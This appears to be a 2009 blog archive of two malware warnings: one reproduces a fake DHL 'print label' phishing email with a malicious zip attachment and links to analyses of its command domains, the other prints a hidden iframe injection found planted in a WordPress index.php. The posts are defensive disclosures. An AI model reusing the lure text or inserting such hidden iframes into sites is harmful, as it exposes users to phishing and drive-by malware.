Archive for the 'Virus' Category

DHL Print Label – MALWARE

Tuesday, October 27th, 2009

I recently received the following email:

Hello!

The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address. 

You may pickup the parcel at our post office personaly!

Please attention!
The shipping label is attached to this e-mail.
Print this label to get this package at our post office.

Please do not reply to this e-mail, it is an unmonitored mailbox.

Thank you,
DHL Global Forwarding Services.

There is a file attached DHL_print_label_cef3e.zip, do not open or run this file as it contains malware.

ThreatExpert behavioral analysis:
http://www.threatexpert.com/report.aspx?md5=8960322225b6a842bad87a285f028f5f

Anubis behavioral analysis:
http://anubis.iseclab.org/?action=result&task_id=1eddf69e4a1adce8441a785cef6c52879

See the Web of Trust (WOT) and MalwareURL reports for mmsfoundsystem .ru, a domain to which this malware phones home, and a related domain:

http://www.mywot.com/en/scorecard/mmsfoundsystem.ru
http://www.malwareurl.com/listing.php?domain=mmsfoundsystem.ru

http://www.mywot.com/en/scorecard/mmmserver.ru
http://www.malwareurl.com/listing.php?domain=mmmserver.ru

– 3Monkeys

HTML/FRAMER virus alert from AVG

Friday, July 17th, 2009

I found the HTML/FRAMER virus had infected this site. It has been eradicated!

For those interested, the following code (commented for security) was inserted into the main index (index.php) by some hacker. For those of you with WordPress blogs I suggest you check you index.php file, the malicious code is inserted at the end on index.php. Other forms of the virus encode the iframe attack.

<!– <iframe src=”http://reycross.net/lib/index.php” width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=”http://reycross.net/lib/index.php” width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> –>